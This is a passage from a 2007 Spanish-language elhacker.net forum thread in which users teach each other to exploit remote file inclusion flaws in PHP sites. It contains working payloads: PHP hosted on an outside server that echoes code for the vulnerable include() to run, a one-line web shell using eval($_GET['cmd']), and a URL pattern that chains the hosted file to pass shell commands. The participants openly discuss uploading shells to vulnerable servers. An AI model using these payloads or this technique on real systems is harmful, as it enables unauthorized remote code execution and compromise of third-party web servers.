elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [?] File include		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [?] File include  (Leído 6,850 veces)
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [?] File include
« Respuesta #10 en: 20 Agosto 2007, 18:15 pm »
muchisimas gracias!!!!
En línea
WannaBeHacker

Desconectado Desconectado

Mensajes: 273



Ver Perfil
Re: [?] File include
« Respuesta #11 en: 20 Agosto 2007, 18:37 pm »
Cita de: yeikos en 20 Agosto 2007, 14:55 pm
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código
  1. <?php phpinfo(); ?>

Pero si se supone que quieres que te funcione una shell por ejemplo , no tedría que ser
http://www.example.org/cn_config.txt? ??
En línea
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [?] File include
« Respuesta #12 en: 20 Agosto 2007, 18:38 pm »
otra cosa , cual de todas las shells deberia funcionar en dicha vulnerabilidad ?? todas sirvirian?  deberia renombrarlas al igual que aparecen en security focus???
es normal que de error 500 al intentar ejecutarla¿? un saludo.
« Última modificación: 20 Agosto 2007, 18:53 pm por Rienzi » En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #13 en: 20 Agosto 2007, 20:38 pm »
WannaBeHacker, el archivo puede ser n_config.txt, archivo.php o file.html, lo importante es el contenido que contenga el archivo.

Un documento de texto o una página web (html) es lo más directo, porque tan solo tendremos que colocar el código a ejecutar, ya que es texto plano. En cambio si es un archivo PHP tendremos que imprimir como texto el código a incluir, por ejemplo, si archivo.php contiene:

Código
  1. <?php phpinfo(); ?>

Obtendremos como resultado la información de nuestro servidor, ya que
estaremos ejecutado phpinfo y el resultado de nuestro servidor será incluido en el servidor vulnerable, por lo tanto no estaremos ejecutando nada en dicho servidor.

En cambio el siguiente código imprime por pantalla <?php phpinfo(); ?>, que es lo que el servidor vulnerable incluirá mediante la función include/require:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

Rienzi, las shells, que en realidad no lo son tanto, poseen diversas funciones que nos simplicaran el trabajo, no es necesario que las utilices, puedes crear la tuya, o simplemente ejecutar códigos directos en el servidor si no quieres complicaciones.
En línea
Rienzi

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [?] File include
« Respuesta #14 en: 20 Agosto 2007, 20:57 pm »
jejeje muchas gracias por responder ahora cuando uso el

Código:
<?php
echo "<?php phpinfo(); ?>";
?>

me da a descargar el archivo phplines de el servidor creo que puedo descargar cualquier archivo del server mmmm es eso??es que no me apareció config alguna jeje creo que se me escapa algo eso si cuando intento abrir el susodicho ar4chivo del server vulnerable me aparece completamente en blanco (abierto con block de notas).
Porcierto de que manera podria enviar comandos directamente? asi
www.vulnerable.com/vuln.php?page=http://www.host2.com/archivo.txt?cmd=[comando] ???

Pd: Creo que en vez de descargar archivos lo que hago es crearlos en el server vurln y descargarlos.
« Última modificación: 20 Agosto 2007, 21:08 pm por Rienzi » En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #15 en: 20 Agosto 2007, 21:27 pm »
Cita de: archivo.txt
<?php
eval($_GET['cmd']);
?>

Revisa los temas anteriores, ya se ha hablado bastante sobre este fallo.
En línea
WannaBeHacker

Desconectado Desconectado

Mensajes: 273



Ver Perfil
Re: [?] File include
« Respuesta #16 en: 20 Agosto 2007, 23:55 pm »
Yeikos, muchísimas gracias por tu tiempo y tu explicación.
Por cierto, es que a mí este bug también me salto con el SSS hace un tiempo cuando realizé un scan, puede ser que el scan fuera un falso positivo verdad? Porque realizo el RFI y no ocurre nada... O que este fixeado???
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] File include
« Respuesta #17 en: 21 Agosto 2007, 00:09 am »
Nunca hay que fiarse al 100% de los escáneres, y menos los que van dirigidos a las aplicaciones Web. Si queréis comprobar si son realmente vulnerables hagan las pruebas ustedes mismos asignándo a la variable una URL; si se carga la página Web o se produce un error, posiblemente es vulnerable.
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines